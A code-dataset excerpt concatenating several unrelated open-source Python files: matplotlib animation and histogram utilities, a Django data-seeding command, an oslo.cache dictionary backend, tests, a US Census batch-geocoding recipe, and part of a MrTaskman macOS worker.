new_vmin = -new_vmax
mesh.set_clim(new_vmin, new_vmax)
return ret
return fig, ax, init, update
def setup_3d_scatter_animation(
fig,
ax,
get_updated_data,
initial_coordinates=None,
initial_colors=None,
x_lims=None,
y_lims=None,
z_lims=None,
axes_equal=True,
invert_xaxis=False,
invert_yaxis=False,
invert_zaxis=False,
marker="o",
s=1.0,
edgecolors="none",
xlabel=None,
ylabel=None,
zlabel=None,
show_frame_label=False,
):
sc = ax.scatter(
[], [], [], marker=marker, s=s, edgecolors=edgecolors, depthshade=False
)
text = (
ax.text2D(0.01, 0.99, "", transform=ax.transAxes, ha="left", va="top")
if show_frame_label
else None
)
set_3d_plot_extent(ax, x_lims, y_lims, z_lims, axes_equal=axes_equal)
set_3d_axis_labels(ax, xlabel, ylabel, zlabel)
if invert_xaxis:
ax.invert_xaxis()
if invert_yaxis:
ax.invert_yaxis()
if invert_zaxis:
ax.invert_zaxis()
def init():
if initial_coordinates is not None:
sc._offsets3d = initial_coordinates
if initial_colors is not None:
sc.set_color(initial_colors)
sc._facecolor3d = sc.get_facecolor()
return (sc, *(() if text is None else (text,)))
def update(frame):
frame_label, coordinates, colors = get_updated_data(frame)
sc._offsets3d = coordinates
if colors is not None:
sc.set_color(colors)
sc._facecolor3d = sc.get_facecolor()
if text is None:
return (sc,)
else:
text.set_text(frame_label)
return (sc, text)
return init, update
def animate(
fig,
init_func,
update_func,
blit=False,
fps=30.0,
video_duration=None,
n_frames=None,
tight_layout=False,
writer="ffmpeg",
codec="h264",
dpi=None,
bitrate=None,
output_path=None,
):
interval = 1e3 / fps
n_frames = n_frames if video_duration is None else int(video_duration * fps)
anim = animation.FuncAnimation(
fig,
update_func,
init_func=init_func,
frames=n_frames,
blit=blit,
interval=interval,
)
if tight_layout:
fig.tight_layout()
if output_path is None:
plt.show()
else:
assert n_frames is not None
anim.save(
output_path,
writer=writer,
codec=codec,
dpi=dpi,
bitrate=bitrate,
fps=fps,
progress_callback=lambda i, n: print(
"Animation progress: {:4.1f}%".format(i * 100.0 / n), end="\r"
),
)
def compute_histogram(
values,
weights=None,
bins="auto",
vmin=None,
vmax=None,
decide_bins_in_log_space=False,
linthresh=None,
weighted_average=False,
min_n_values=None,
density=False,
):
min_value = np.nanmin(values) if vmin is None else vmin
max_value = np.nanmax(values) if vmax is None else vmax
if isinstance(bins, list):
bins = np.array(bins)
if decide_bins_in_log_space:
if linthresh is None:
normalizer = get_log_normalizer(min_value, max_value)
else:
normalizer = get_symlog_normalizer(
min_value, max_value, linthresh=linthresh
)
else:
normalizer = get_linear_normalizer(min_value, max_value)
values = normalizer(values)
min_value = normalizer(min_value)
max_value = normalizer(max_value)
if isinstance(bins, np.ndarray):
bins = normalizer(bins)
hist, bin_edges = np.histogram(
values,
bins=bins,
range=(min_value, max_value),
weights=weights,
density=density,
)
if weights is not None and weighted_average:
unweighted_hist, _ = np.histogram(
values, bins=bin_edges, range=(min_value, max_value)
)
hist /= unweighted_hist
if min_n_values is not None:
hist[unweighted_hist < min_n_values] = np.nan
bin_centers = 0.5 * (bin_edges[:-1] + bin_edges[1:])
bin_edges = normalizer.inverse(bin_edges)
bin_centers = normalizer.inverse(bin_centers)
return hist, bin_edges, bin_centers
def compute_histogram_difference(
values, weights, vmin, vmax, bins, decide_bins_in_log_space
):
left_values, right_values = values
left_weights, right_weights = weights
min_value = (
min(np.nanmin(left_values), np.nanmin(right_values)) if vmin is None else vmin
)
max_value = (
max(np.nanmax(left_values), np.nanmax(right_values)) if vmax is None else vmax
)
if decide_bins_in_log_space:
left_values = np.log10(left_values)
right_values = np.log10(right_values)
min_value = np.log10(min_value)
max_value = np.log10(max_value)
left_hist, bin_edges = np.histogram(
left_values, bins=bins, range=(min_value, max_value), weights=left_weights
)
right_hist, _ = np.histogram(
right_values,
bins=bin_edges,
range=(min_value, max_value),
weights=right_weights,
)
bin_centers = 0.5 * (bin_edges[:-1] + bin_edges[1:])
if decide_bins_in_log_space:
bin_edges = 10**bin_edges
bin_centers = 10**bin_centers
return left_hist - right_hist, bin_edges, bin_centers
def compute_2d_histogram(
values_x,
values_y,
weights,
vmin_x,
vmax_x,
vmin_y,
vmax_y,
log_x,
log_y,
bins_x,
bins_y,
weighted_average,
):
min_value_x = np.nanmin(values_x) if vmin_x is None else vmin_x
max_value_x = np.nanmax(values_x) if vmax_x is None else vmax_x
min_value_y = np.nanmin(values_y) if vmin_y is None else vmin_y
max_value_y = np.nanmax(values_y) if vmax_y is None else vmax_y
if vmin_x is not None and vmin_x > min_value_x:
min_value_x = vmin_x
if vmax_x is not None and vmax_x < max_value_x:
max_value_x = vmax_x
if vmin_y is not None and vmin_y > min_value_y:
min_value_y = vmin_y
if vmax_y is not None and vmax_y < max_value_y:
max_value_y = vmax_y
if log_x:
values_x = np.log10(values_x)
min_value_x = np.log10(min_value_x)
max_value_x = np.log10(max_value_x)
if log_y:
values_y = np.log10(values_y)
min_value_y = np.log10(min_value_y)
max_value_y = np.log10(max_value_y)
hist, bin_edges_x, bin_edges_y = np.histogram2d(
values_x,
values_y,
bins=[bins_x, bins_y],
range=[[min_value_x, max_value_x], [min_value_y, max_value_y]],
weights=weights,
)
if weights is not None and weighted_average:
unweighted_hist, _, _ = np.histogram2d(
values_x,
values_y,
bins=[bin_edges_x, bin_edges_y],
range=[[min_value_x, max_value_x], [min_value_y, max_value_y]],
)
hist /= unweighted_hist
return hist, bin_edges_x, bin_edges_y
def compute_2d_histogram_difference(
values_x,
values_y,
weights,
vmin_x,
vmax_x,
vmin_y,
vmax_y,
log_x,
log_y,
bins_x,
bins_y,
):
left_values_x, right_values_x = values_x
left_values_y, right_values_y = values_y
left_weights, right_weights = weights
left_hist, bin_edges_x, bin_edges_y = compute_2d_histogram(
left_values_x,
left_values_y,
left_weights,
vmin_x,
vmax_x,
vmin_y,
vmax_y,
log_x,
log_y,
bins_x,
bins_y,
False,
)
right_hist, _, _ = compute_2d_histogram(
right_values_x,
right_values_y,
right_weights,
vmin_x,
vmax_x,
vmin_y,
vmax_y,
log_x,
log_y,
bins_x,
bins_y,
False,
)
return left_hist - right_hist, bin_edges_x, bin_edges_y
CUSTOM_COLORMAPS = {
"transport": define_linear_segmented_colormap(
"",
np.vstack(
(
plt.get_cmap("Blues")(np.linspace(1, 0, 256)),
[[1.0, 1.0, 1.0, 1.0]],
plt.get_cmap("Oranges")(np.linspace(0, 1, 256)),
)
),
bad_color="white",
N=513,
),
"transport_inv": define_linear_segmented_colormap(
"",
np.vstack(
(
[[1.0, 1.0, 1.0, 1.0]],
plt.get_cmap("Blues_r")(np.linspace(1, 0, 256)),
plt.get_cmap("Oranges_r")(np.linspace(0, 1, 256)),
[[1.0, 1.0, 1.0, 1.0]],
)
),
bad_color="white",
N=514,
),
"Orangesw_r": define_linear_segmented_colormap(
"",
np.vstack(
(plt.get_cmap("Oranges_r")(np.linspace(0, 1, 256)), [[1.0, 1.0, 1.0, 1.0]])
),
bad_color="white",
N=257,
),
"afternoon": define_linear_segmented_colormap(
"", ["#8C0004", "#C8000A", "#E8A735", "#E2C499"]
),
"timeless": define_linear_segmented_colormap(
"", ["#16253D", "#002C54", "#EFB509", "#CD7213"]
),
"arctic": define_linear_segmented_colormap(
"", ["#006C84", "#6EB5C0", "#E2E8E4", "#FFCCBB"]
),
"sunkissed": define_linear_segmented_colormap(
"", ["#D24136", "#EB8A3E", "#EBB582", "#785A46"]
),
"berry": define_linear_segmented_colormap(
"", ["#D0E1F9", "#4D648D", "#283655", "#1E1F26"]
),
"sunset": define_linear_segmented_colormap(
"", ["#363237", "#2D4262", "#73605B", "#D09683"]
),
"watery": define_linear_segmented_colormap(
"", ["#021C1E", "#004445", "#2C7873", "#6FB98F"]
),
"bright": define_linear_segmented_colormap(
"", ["#061283", "#FD3C3C", "#FFB74C", "#138D90"]
),
"school": define_linear_segmented_colormap(
"", ["#81715E", "#FAAE3D", "#E38533", "#E4535E"]
),
"golden": define_linear_segmented_colormap(
"", ["#323030", "#CDBEA7", "#C29545", "#882426"]
),
"misty": define_linear_segmented_colormap(
"", ["#04202C", "#2C493F", "#5B7065", "#C9D1C8"]
),
"coolblues": define_linear_segmented_colormap(
"", ["#003B46", "#07575B", "#66A5AD", "#C4DFE6"]
),
"candy": define_linear_segmented_colormap(
"", ["#AD1457", "#D81B60", "#FFA000", "#FDD835", "#FFEE58"]
),
}
CB_COLOR_CYCLE = [
"#dc143c",
"#377eb8",
"#ff7f00",
"#4daf4a",
"#984ea3",
"#a65628",
"#f781bf",
"#999999",
"#dede00",
]
| 25.879798 | 88 | 0.581944 | 395 | 0.007709 | 0 | 0 | 0 | 0 | 0 | 0 | 2,278 | 0.044456 |
352ac045aca6f34db9114bf0106c20cfc01aaf2f | 4,174 | py | Python | cms/management/commands/create_initial_data.py | dcreekp/pythondotorg | 56b8707bcb6121d636177ad69b9d345c307405be | [
"Apache-2.0"
] | 1 | 2018-07-30T07:32:26.000Z | 2018-07-30T07:32:26.000Z | cms/management/commands/create_initial_data.py | Nathanator/pythondotorg | 694f2e0afcd8f8c4882f9f3ae0a74f2d95dfcd18 | [
"Apache-2.0"
] | null | null | null | cms/management/commands/create_initial_data.py | Nathanator/pythondotorg | 694f2e0afcd8f8c4882f9f3ae0a74f2d95dfcd18 | [
"Apache-2.0"
] | null | null | null | import importlib
import inspect
import pprint
from django.apps import apps
from django.core.management import BaseCommand, call_command
class Command(BaseCommand):
help = 'Create initial data by using factories.'
def add_arguments(self, parser):
parser.add_argument(
'--app-label',
dest='app_label',
help='Provide an app label to create app specific data (e.g. --app-label boxes)',
)
parser.add_argument(
'--flush',
action='store_true',
dest='do_flush',
help='Remove existing data in the database before creating new data.',
)
def collect_initial_data_functions(self, app_label):
functions = {}
if app_label:
try:
app_list = [apps.get_app_config(app_label)]
except LookupError:
self.stdout.write(self.style.ERROR('The app label provided does not exist as an application.'))
return
else:
app_list = apps.get_app_configs()
for app in app_list:
try:
factory_module = importlib.import_module('{}.factories'.format(app.name))
except ImportError:
continue
else:
for name, function in inspect.getmembers(factory_module, inspect.isfunction):
if name == 'initial_data':
functions[app.name] = function
break
return functions
def output(self, app_name, verbosity, *, done=False, result=False):
if verbosity > 0:
if done:
self.stdout.write(self.style.SUCCESS('DONE'))
else:
self.stdout.write('Creating initial data for {!r}... '.format(app_name), ending='')
if verbosity >= 2 and result:
pprint.pprint(result)
def flush_handler(self, do_flush, verbosity):
if do_flush:
msg = (
'You have provided the --flush argument, this will cleanup '
'the database before creating new data.\n'
'Type \'y\' or \'yes\' to continue, \'n\' or \'no\' to cancel: '
)
else:
msg = (
'Note that this command won\'t cleanup the database before '
'creating new data.\n'
'If you would like to cleanup the database before creating '
'new data, call create_initial_data with --flush.\n'
'Type \'y\' or \'yes\' to continue, \'n\' or \'no\' to cancel: '
)
confirm = input(self.style.WARNING(msg))
if do_flush and confirm in ('y', 'yes'):
try:
call_command('flush', verbosity=verbosity, interactive=False)
except Exception as exc:
self.stdout.write(self.style.ERROR('{}: {}'.format(type(exc).__name__, exc)))
return confirm
def handle(self, **options):
verbosity = options['verbosity']
app_label = options['app_label']
do_flush = options['do_flush']
confirm = self.flush_handler(do_flush, verbosity)
if confirm not in ('y', 'yes'):
return
# Collect relevant functions for data generation.
functions = self.collect_initial_data_functions(app_label)
if not functions:
return
if not app_label:
self.output('sitetree', verbosity)
try:
call_command('loaddata', 'sitetree_menus', '-v0')
except Exception as exc:
self.stdout.write(self.style.ERROR('{}: {}'.format(type(exc).__name__, exc)))
else:
self.output('sitetree', verbosity, done=True)
for app_name, function in functions.items():
self.output(app_name, verbosity)
try:
result = function()
except Exception as exc:
self.stdout.write(self.style.ERROR('{}: {}'.format(type(exc).__name__, exc)))
continue
else:
self.output(app_name, verbosity, done=True, result=result)
| 37.603604 | 111 | 0.551509 | 4,034 | 0.966459 | 0 | 0 | 0 | 0 | 0 | 0 | 968 | 0.231912 |
352b63d351b0fa1ec394f4c8e0212687ff1e36ed | 3,290 | py | Python | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | 29 | 2015-04-26T16:05:14.000Z | 2021-12-31T15:03:19.000Z | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | null | null | null | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | 19 | 2015-06-15T23:51:10.000Z | 2020-12-10T00:03:21.000Z | # Copyright 2015 Mirantis Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""dogpile.cache backend that uses dictionary for storage"""
from dogpile.cache import api
from oslo_cache import core
from oslo_utils import timeutils
__all__ = [
'DictCacheBackend'
]
_NO_VALUE = core.NO_VALUE
class DictCacheBackend(api.CacheBackend):
"""A DictCacheBackend based on dictionary.
Arguments accepted in the arguments dictionary:
:param expiration_time: interval in seconds to indicate maximum
time-to-live value for each key in DictCacheBackend.
Default expiration_time value is 0, that means that all keys have
infinite time-to-live value.
:type expiration_time: real
"""
def __init__(self, arguments):
self.expiration_time = arguments.get('expiration_time', 0)
self.cache = {}
def get(self, key):
"""Retrieves the value for a key.
:param key: dictionary key
:returns: value for a key or :data:`oslo_cache.core.NO_VALUE`
for nonexistent or expired keys.
"""
(value, timeout) = self.cache.get(key, (_NO_VALUE, 0))
if self.expiration_time > 0 and timeutils.utcnow_ts() >= timeout:
self.cache.pop(key, None)
return _NO_VALUE
return value
def get_multi(self, keys):
"""Retrieves the value for a list of keys."""
return [self.get(key) for key in keys]
def set(self, key, value):
"""Sets the value for a key.
Expunges expired keys during each set.
:param key: dictionary key
:param value: value associated with the key
"""
self.set_multi({key: value})
def set_multi(self, mapping):
"""Set multiple values in the cache.
Expunges expired keys during each set.
:param mapping: dictionary with key/value pairs
"""
self._clear()
timeout = 0
if self.expiration_time > 0:
timeout = timeutils.utcnow_ts() + self.expiration_time
for key, value in mapping.items():
self.cache[key] = (value, timeout)
def delete(self, key):
"""Deletes the value associated with the key if it exists.
:param key: dictionary key
"""
self.cache.pop(key, None)
def delete_multi(self, keys):
"""Deletes the value associated with each key in list if it exists.
:param keys: list of dictionary keys
"""
for key in keys:
self.cache.pop(key, None)
def _clear(self):
"""Expunges expired keys."""
now = timeutils.utcnow_ts()
for k in list(self.cache):
(_value, timeout) = self.cache[k]
if timeout > 0 and now >= timeout:
del self.cache[k]
| 30.747664 | 75 | 0.640426 | 2,491 | 0.757143 | 0 | 0 | 0 | 0 | 0 | 0 | 1,863 | 0.566261 |
352db0e47177ceb1a3626611938052d395f6e3f9 | 725 | py | Python | preprocessdata.py | zoepie/HTML-Project | dd6a177729312e75ed2dbc702e521eea5b2d63f3 | [
"MIT"
] | null | null | null | preprocessdata.py | zoepie/HTML-Project | dd6a177729312e75ed2dbc702e521eea5b2d63f3 | [
"MIT"
] | null | null | null | preprocessdata.py | zoepie/HTML-Project | dd6a177729312e75ed2dbc702e521eea5b2d63f3 | [
"MIT"
] | null | null | null | import numpy as np
from bs4 import BeautifulSoup
from tqdm import tqdm
import json
def read_file(filename):
with open(filename, 'r', encoding='utf-8') as f:
contents = f.read()
soup = BeautifulSoup(contents, "html.parser")
return soup
if __name__ == '__main__':
with open('name2idx.json', 'r') as fp:
name2idx = json.load(fp)
with open('data/0.txt', 'r', encoding='utf-8')as f:
contents = f.read()
soup = BeautifulSoup(contents, "html.parser")
for tag in soup.find_all():
try:
if tag['class']:
tag['class'] = '###' + str(name2idx[' '.join(tag['class'])])
except KeyError:
continue
print(soup)
| 23.387097 | 76 | 0.572414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 115 | 0.158621 |
353078a42c25216e1cef61978c7cbdf901484947 | 2,658 | py | Python | tests/test_surrogates.py | scott-trinkle/braingraphgeo | 990c4956acf8fe56f9bdb8871c265c4ea28da9a9 | [
"MIT"
] | null | null | null | tests/test_surrogates.py | scott-trinkle/braingraphgeo | 990c4956acf8fe56f9bdb8871c265c4ea28da9a9 | [
"MIT"
] | null | null | null | tests/test_surrogates.py | scott-trinkle/braingraphgeo | 990c4956acf8fe56f9bdb8871c265c4ea28da9a9 | [
"MIT"
] | null | null | null | import numpy as np
from numpy.testing import assert_array_equal, assert_array_almost_equal
from context import braingraphgeo as bgg
def test_geomsurr(sample_W_1, sample_D):
W = sample_W_1.values
d = sample_D.values
Wgeo = bgg.surrogates.geomsurr(W, d, rs=2021)
result = np.array([[0., 0.00072248, 0.00041477, 0.00033229, 0.00117053,
0.00055464, 0.00036433, 0.00056055],
[0.00072248, 0., 0.00057277, 0.0002278, 0.00030153,
0.00046146, 0.00016146, 0.00036927],
[0.00041477, 0.00057277, 0., 0.00048042, 0.00045515,
0.00033993, 0.00037418, 0.00065622],
[0.00033229, 0.0002278, 0.00048042, 0., 0.000422,
0.00063961, 0.00049343, 0.00052139],
[0.00117053, 0.00030153, 0.00045515, 0.000422, 0.,
0.00067446, 0.00056217, 0.00054075],
[0.00055464, 0.00046146, 0.00033993, 0.00063961, 0.00067446,
0., 0.00050643, 0.00012118],
[0.00036433, 0.00016146, 0.00037418, 0.00049343, 0.00056217,
0.00050643, 0., 0.00035025],
[0.00056055, 0.00036927, 0.00065622, 0.00052139, 0.00054075,
0.00012118, 0.00035025, 0.]])
assert_array_almost_equal(Wgeo, result)
def test_randomsurr(sample_W_1):
W = sample_W_1.values
Wrand = bgg.surrogates.randomsurr(W, rs=2021)
result = np.array([[0., 0.00051785, 0.00048846, 0.00030557, 0.0009939,
0.00062903, 0.00050726, 0.0006635],
[0.00051785, 0., 0.00062675, 0.00057998, 0.00049284,
0.00040059, 0.00016569, 0.00032815],
[0.00048846, 0.00062675, 0., 0.00049396, 0.00038688,
0.00012943, 0.00028872, 0.00041774],
[0.00030557, 0.00057998, 0.00049396, 0., 0.00045934,
0.00066296, 0.00040632, 0.00036962],
[0.0009939, 0.00049284, 0.00038688, 0.00045934, 0.,
0.00052429, 0.0005764, 0.00069369],
[0.00062903, 0.00040059, 0.00012943, 0.00066296, 0.00052429,
0., 0.00041742, 0.00037452],
[0.00050726, 0.00016569, 0.00028872, 0.00040632, 0.0005764,
0.00041742, 0., 0.00045061],
[0.0006635, 0.00032815, 0.00041774, 0.00036962, 0.00069369,
0.00037452, 0.00045061, 0.]])
assert_array_almost_equal(Wrand, result)
| 53.16 | 83 | 0.52784 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
35307980268b82f9e8f16546c421f49a138ad4df | 7,477 | py | Python | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | census-us/custom-recipes/address-batch-geocoder-us-census-geo/recipe.py | RedaAffane/dataiku-contrib | d409ddc25d31570972a14abb19a84ac101afc6cc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import dataiku
import pandas as pd, numpy as np
from dataiku import pandasutils as pdu
import requests
#import time
from dataiku.customrecipe import *
import sys
import re
import geocoder_utils
import common
import os
logging.info('1/6 Creating base folder...' )
path_datadir_tmp = dataiku.get_custom_variables()["dip.home"] + '/tmp/'
P_CENSUS_CONTENT = 'geocoder'
FOLDER_NAME = 'tmp_census_us_'+ P_CENSUS_CONTENT
common.create_folder(path_datadir_tmp,FOLDER_NAME,True)
input_name = get_input_names_for_role('input')[0]
output_ = get_output_names_for_role('output')[0]
output_dataset = dataiku.Dataset(output_)
P_COL_STREET = get_recipe_config()['p_col_street']
P_COL_CITY = get_recipe_config()['p_col_city']
P_COL_STATE = get_recipe_config()['p_col_state']
P_COL_ZIPCODE = get_recipe_config()['p_col_zipcode']
P_BENCHMARK = get_recipe_config()['p_benchmark']
P_VINTAGE = get_recipe_config()['p_vintage']
if P_BENCHMARK=="9":
P_VINTAGE ="910"
logging.info('2/6 Parameters:')
logging.info('[+] BENCHMARK = {} ; VINTAGE = {} '.format(P_BENCHMARK,P_VINTAGE))
P_BATCH_SIZE_UNIT = int(get_recipe_config()['param_batch_size'])
if P_BATCH_SIZE_UNIT is None:
P_BATCH_SIZE_UNIT = 5000
id_column = get_recipe_config()['p_col_id_column']
id_as_int = get_recipe_config()['param_id_as_int']
P_KEEP_NON_MATCHING = get_recipe_config()['param_keep_non_matching']
#P_RETRY_TIE = True #get_recipe_config()['param_retry_tie'] ### Potential optimization by resubmitting the ties.
in_cols = [id_column,P_COL_STREET,P_COL_CITY,P_COL_STATE,P_COL_ZIPCODE]
if id_as_int:
id_type='int'
else:
id_type='string'
logging.info('3/6 Input columns:')
logging.info(in_cols)
schema = [{'name':id_column,'type':id_type}
,{'name':'street','type':'string'}
,{'name':'city','type':'string'}
,{'name':'state','type':'string'}
,{'name':'zipcode','type':'string'}
,{'name':'match','type':'string'}
,{'name':'match_quality','type':'string'}
,{'name':'matched_address','type':'string'}
,{'name':'matched_state','type':'string'}
,{'name':'matched_city','type':'string'}
,{'name':'matched_zipcode','type':'string'}
,{'name':'matched_longitude','type':'string'}
,{'name':'matched_latitude','type':'string'}
,{'name':'matched_tigerLineId','type':'string'}
,{'name':'matched_side','type':'string'}
,{'name':'matched_state_id','type':'string'}
,{'name':'matched_county_id','type':'string'}
,{'name':'matched_tract_id','type':'string'}
,{'name':'matched_block_id','type':'string'}
,{'name':'tract_id','type':'string'}
,{'name':'block_group_id','type':'string'}
,{'name':'block_id','type':'string'}]
out_cols=[x['name'] for x in schema]
logging.info('4/6 Writing schema...')
output_dataset.write_schema(schema)
logging.info('5/6 Starting Batch...:')
batch_list_ok = []
b=-1
with output_dataset.get_writer() as writer:
for df in dataiku.Dataset(input_name).iter_dataframes(chunksize= P_BATCH_SIZE_UNIT , columns = in_cols):
b = b +1
logging.info('Processing batch: %s' % (b))
df = df[df[P_COL_STREET]<>'']
file_full_path = path_datadir_tmp + '/' + FOLDER_NAME + '/' + 'census_geocode_adresses_' + str(b) + '.csv'
df.to_csv(file_full_path,sep=',',index=None,header=None)
url = 'https://geocoding.geo.census.gov/geocoder/geographies/addressbatch?form'
payload = {'benchmark':P_BENCHMARK,'vintage':P_VINTAGE,'layers':14}
files = {'addressFile': (file_full_path, open(file_full_path, 'rb'), 'text/csv')}
try:
batch = requests.post(url, files=files, data = payload)
if batch.status_code == 200:
results = str(batch.text)
results = re.sub('"','',results)
results = results.split('\n')
for i,result in enumerate(results[:-1]):
res_parsed = results[i].split(',')
try:
idx = res_parsed.index('Match')
if idx==6:
res_parsed[1] = res_parsed[1] + res_parsed[2]
del res_parsed[2]
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
elif idx==4:
ok4 = res_parsed[4]=='Match'
res_parsed.insert(3,'-')
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
elif idx==5:
d=geocoder_utils.batch_geo_parse_regulars(res_parsed,out_cols)
else:
d={}
d[id_column]=res_parsed[0]
for k in out_cols[1:]:
d[k]=''
d['match']='Matched parsing required'
d['match_quality']=res_parsed
writer.write_row_dict(d)
except:
if P_KEEP_NON_MATCHING is True:
if len(res_parsed)==6:
d = pd.DataFrame([res_parsed],columns=out_cols[:6]).to_dict('record')[0]
elif len(res_parsed)==7:
res_parsed[1] = res_parsed[1] + res_parsed[2]
del res_parsed[2]
d = pd.DataFrame([res_parsed],columns=out_cols[:6]).to_dict('record')[0]
else:
d={}
d[id_column]=res_parsed[0]
for k in out_cols[1:]:
d[k]=''
d['match']='Custom parsing required'
d['match_quality']=res_parsed
writer.write_row_dict(d)
else:
logging.info("[Warning] : API returns this status: {}".format(s.status_code))
#except MaxRetryError as maxerror:
#print("Max Retries Error:", maxerror)
except requests.exceptions.HTTPError as Herr:
logging.info("Http Error:", Herr)
except requests.exceptions.ConnectionError as errc:
logging.info("Error Connecting:", errc)
except requests.exceptions.Timeout as errt:
logging.info("Timeout Error:", errt)
except requests.exceptions.RequestException as err:
logging.info("Something Else", err)
batch_list_ok.append(b)
## DEL ALL
logging.info('6/6 Dropping intermediate files...:' )
cmd = "rm -rf %s" % (path_datadir_tmp + '/' +FOLDER_NAME)
os.system(cmd)
| 35.77512 | 115 | 0.5216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,840 | 0.246088 |
35309344c14773040e0f8d93e109f4776a3d6c80 | 15,008 | py | Python | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | workers/macos/worker.py | joweeba/mrtaskman | cef92f11cca3de45c77b76a68a91d85af9c8fb48 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MrTaskman worker script which executes MacOS commands."""
__author__ = 'jeff.carollo@gmail.com (Jeff Carollo)'
import cStringIO
import datetime
import httplib
import json
import logging
import os
import socket
import StringIO
import subprocess
import sys
import time
import urllib2
import gflags
from client import mrtaskman_api
from client import package_installer
from client import package_cache
from common import device_info
from common import http_file_upload
from common import parsetime
from common import split_stream
FLAGS = gflags.FLAGS
gflags.DEFINE_string('log_filename', '', 'Where to log stuff. Required.')
gflags.DEFINE_string('worker_name', '', 'Unique worker name.')
gflags.DEFINE_list('worker_capabilities', ['macos', 'android'],
'Things this worker can do.')
# Package cache flags.
gflags.DEFINE_boolean('use_cache', True, 'Whether or not to use package cache.')
gflags.DEFINE_string('cache_path',
'/usr/local/worker_cache',
'Where to cache packages.')
gflags.DEFINE_integer('min_duration_seconds', 60,
'Minimum time to cache something.')
gflags.DEFINE_integer('max_cache_size_bytes', 2 * 1024 * 1024 * 1024,
'Maximum size of the cache in bytes.')
gflags.DEFINE_float('low_watermark_percentage', 0.6,
'When cleaning up, keeps at least this much cache.')
gflags.DEFINE_float('high_watermark_percentage', 0.8,
'When cleaning up, deletes to below this line.')
class TaskError(Exception):
pass
class MrTaskmanUnrecoverableHttpError(TaskError):
pass
class MrTaskmanRecoverableHttpError(TaskError):
pass
def GetHostname():
return socket.gethostname()
class MacOsWorker(object):
"""Executes macos tasks."""
def __init__(self, worker_name, log_stream):
self.worker_name_ = worker_name
self.log_stream_ = log_stream
self.api_ = mrtaskman_api.MrTaskmanApi()
self.hostname_ = GetHostname()
self.capabilities_ = {'executor': self.GetCapabilities()}
self.executors_ = {}
for capability in self.capabilities_['executor']:
self.executors_[capability] = self.ExecuteTask
self.use_cache_ = FLAGS.use_cache
if self.use_cache_:
self.package_cache_ = package_cache.PackageCache(
FLAGS.min_duration_seconds,
FLAGS.max_cache_size_bytes,
FLAGS.cache_path,
FLAGS.low_watermark_percentage,
FLAGS.high_watermark_percentage)
def GetCapabilities(self):
capabilities = device_info.GetCapabilities()
capabilities.append('macos')
capabilities.append(self.worker_name_)
return capabilities
def AssignTask(self):
"""Makes a request to /tasks/assign to get assigned a task.
Returns:
Task if a task was assigned, or None.
"""
try:
task = self.api_.AssignTask(self.worker_name_, self.hostname_,
self.capabilities_)
return task
except urllib2.HTTPError, e:
logging.info('Got %d HTTP response from MrTaskman on AssignTask.',
e.code)
return None
except urllib2.URLError, e:
logging.info('Got URLError trying to reach MrTaskman: %s', e)
return None
def SendResponse(self, task_id, stdout, stderr, task_result):
while True:
try:
# TODO(jeff.carollo): Refactor.
device_sn = device_info.GetDeviceSerialNumber()
task_result['device_serial_number'] = device_sn
response_url = self.api_.GetTaskCompleteUrl(task_id)
if not response_url:
logging.info('No task complete url for task_id %s', task_id)
return
response_url = response_url.get('task_complete_url', None)
if not response_url:
logging.info('No task complete url for task_id %s', task_id)
return
self.api_.SendTaskResult(response_url, stdout, stderr, task_result)
logging.info('Successfully sent response for task %s: %s',
task_id, self.api_.MakeTaskUrl(task_id))
return
except urllib2.HTTPError, error_response:
body = error_response.read()
code = error_response.code
if code == 404:
logging.warning('TaskCompleteUrl timed out.')
continue
logging.warning('SendResponse HTTPError code %d\n%s',
code, body)
return
except urllib2.URLError, e:
logging.info(
'Got URLError trying to send response to MrTaskman: %s', e)
logging.info('Retrying in 10 seconds')
time.sleep(10)
continue
def GetTaskCompleteUrl(self, task_id):
try:
return self.api_.GetTaskCompleteUrl(task_id)
except urllib2.HTTPError, error_response:
body = error_response.read()
code = error_response.code
logging.warning('GetTaskCompleteUrl HTTPError code %d\n%s',
code, body)
def ShouldWaitForDevice(self):
"""Returns True iff this worker controls a device which is offline."""
if not device_info.DEVICE_SN:
return False
return not device_info.DeviceIsConnected()
def PollAndExecute(self):
logging.info('Polling for work...')
device_active = True
while True:
try:
if self.ShouldWaitForDevice():
if device_active:
logging.info('Device %s is offline. Waiting for it to come back.',
